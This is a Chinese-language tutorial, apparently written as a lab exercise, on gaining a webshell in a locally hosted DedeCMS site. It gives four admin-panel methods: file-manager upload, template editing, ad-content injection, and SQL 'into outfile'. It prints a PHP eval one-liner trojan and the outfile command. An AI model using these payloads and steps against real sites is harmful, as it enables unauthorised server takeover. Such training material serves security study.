dedecms织梦【php网站】-----获取webshell攻略

Dedecms 是 织梦团队 的php网站管理系统 使用 小皮搭建网站

1.搭建dedecms网站

下载Dedecms压缩包,解压后,放在小皮搭建的网站根目录下。

开启小皮的Apache或者Nginx和MySQL服务

2. 获取webshell

2.1 姿势⼀:通过⽂件管理器上传WebShell

思路:dedecms 后台可以直接上传任意⽂件,可以通过⽂件管理器上传 php⽂件获取webshell..

2.1.1 访问网站进行安装

访问网址:ip/网址根目录的文件名/其中的uploads文件夹/install

http://172.16.2.41/DedeCMS/uploads/install

逐步完成安装,参数配置 数据库连接小皮的MySQL数据库。

2.1.2 配置相关信息,并进行后台登录

#后台 http://172.16.1.10/dede

#信息

username:admin

password:123456

2.1.3 上传一句话木马

登陆到后台点击 【核⼼】 --》 【⽂件式管理器】 --》 【⽂件上传】 将准备好的⼀句话代
码上传...OK

2.1.4 访问文件,蚁剑连接

双击shell.php访问,将url在蚁剑进行连接,即获得webshell

2.2 姿势⼆:修改模板⽂件拿WebShell

2.2.1 修改网站默认模板,写入一句话木马

与WPCMS类似,直接修改模板拿WebShell..

点击 【模板】 --》 【默认模板管理】 --》 【index.htm】

---》【修改】 在⽂件修改中添加phpinfo();....如下 点击保存

2.2.2 更新主页

点击 【⽣成】 --》 【更新主⻚ HTML 】 --》将主⻚位置修改为 【 ../index.php 】--》
点击 【⽣成静态】 --》点击 【更新主⻚】 再次访问站点⾸⻚可发现变化.


2.2.3 访问主页

url:172.16.2.41/DedeCMS/uploads/index.php

点击浏览,即可发现phpinfo()执行成功

2.3 姿势三:后台任意命令执⾏拿WebShell

点击 【模块】 --》 【⼴告管理】 --》 【增加⼀个新⼴告】 --》在 【⼴告内容】 处添
加⼀句话代码--》点击 【确定】


点击【代码】

获取拼接的部分路径:/DedeCMS/uploads/plus/ad_js.php?aid=1

拼接url进行访问:http://172.16.2.41/DedeCMS/uploads/plus/ad_js.php?aid=1

蚁剑进行连接,即获得webshell

2.4 姿势四: 通过后台sql命令执⾏拿webshell

点击系统---SQL命令行工具
输入:select @@basedir; 发现页面显示目录地址 可判断出网站根目录

into outfile 写入一句话木马文件
select '<?php @eval($_POSTcmd);>' into outfile 'E:/phpstudy_pro/WWW/shell.php'

访问该木马文件,蚁剑进行连接,即获得webshell

DEDECMS 织梦 网站框架常见漏洞的利用

多种获取shell的方法练习。

练习结束,望大家能有所帮助和收获。

拜拜。。。

-------------2025/3/20 21:51

相关推荐
两个人的幸福11 天前
Windows 桌面应用自研 PHP 队列(下):完整代码与六大工程化优化
php
BingoGo13 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
JaguarJack13 天前
PHP 泛型之殇 泛型 RFC 提案被拒绝
后端·php
用户30745969820714 天前
PHP 扩展——从入门到理解
php
鹏仔先生14 天前
拷贝漫画APP下载页PHP程序,后台带免费AI写作
php
云水一下15 天前
从零开始学 PHP 系列(一):PHP 的前世今生与开发环境搭建
开发语言·php
treesforest15 天前
AI安全系统如何识别异常访问?IP风险识别正在成为关键能力
网络·人工智能·tcp/ip·安全·web安全
xingpanvip15 天前
星盘接口开发文档:本命盘接口指南
android·开发语言·css·php·lua
上海云盾第一敬业销售15 天前
深入解析WAF的工作原理与机制
web安全·ddos
憧憬成为web高手15 天前
l33t-hoster
学习·web安全·网络安全